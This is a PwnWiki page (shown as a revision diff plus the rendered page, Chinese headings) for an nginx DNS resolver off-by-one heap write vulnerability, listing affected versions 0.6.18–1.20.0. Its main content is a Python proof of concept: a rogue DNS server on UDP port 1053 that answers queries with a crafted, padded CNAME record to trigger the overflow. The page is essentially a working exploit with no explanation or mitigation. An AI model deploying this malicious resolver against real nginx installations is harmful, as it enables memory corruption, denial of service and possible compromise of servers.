Difference between revisions of "CVE-2021-23097 Nginx解析器 Off-by-One堆寫入漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> 0.6.18 - 1.20.0 </pre> ==POC== <pre> from binascii import hexlify, unhexlify from socket import AF_INET, SOCK_DG...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 36: Line 36:
  
 
<translate>
 
<translate>
==參考==
+
==參考== <!--T:2-->
 
</translate>
 
</translate>
 
https://github.com/x41sec/advisories/blob/master/X41-2021-002/poc.py
 
https://github.com/x41sec/advisories/blob/master/X41-2021-002/poc.py

Latest revision as of 22:48, 15 June 2021

Other languages:

影響版本

0.6.18 - 1.20.0

POC

from binascii import hexlify, unhexlify
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack

sock = socket(AF_INET, SOCK_DGRAM)
sock.bind(('0.0.0.0', 1053))

while True:
    request, addr = sock.recvfrom(4096)
    print(b'<<< '+hexlify(request))
    ident = request[0:2]
    # find request
    nullptr = request.find(0x0,12)
    reqname = request[12:request.find(0x0,12)+1]
    reqtype = request[nullptr+1:nullptr+3]
    reqclass = request[nullptr+3:nullptr+5]
    print('name: %s, type: %s, class: %s' % (reqname, unpack('>H', reqtype), unpack('>H', reqclass)))
    # CNAME response
    response = request[0:2] + \
               unhexlify('''81800001000100000000''') + \
               reqname + reqtype + reqclass + \
               unhexlify('c00c0005000100000e10000b18414141414141414141414141414141414141414141414141c004')
    print(b'>>> '+hexlify(response))
    sock.sendto(bytes(response), addr)